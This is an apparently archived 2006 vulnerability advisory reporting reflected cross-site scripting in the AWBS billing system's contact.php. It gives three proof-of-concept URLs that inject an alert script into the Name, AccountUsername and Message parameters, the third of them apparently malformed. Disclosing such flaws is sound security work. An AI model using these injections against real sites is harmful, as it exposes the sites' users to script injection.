Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13696
HistoryAug 02, 2006 - 12:00 a.m.

XSS vulnerability on AWBS

2006-08-0200:00:00
vulners.com
13

AWBS=Advanced Webhost Billing System

Exploit;

1.)http://[site adres]/contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1

2.)http://[site adres]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername='><script>alert('XSS Vulnerability')%3B</script>&Message=1

3.)http://[site adres]/action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=</textarea><script>alert('XSS Vulnerability')%3B</script>

.newbinaryfile

[email protected]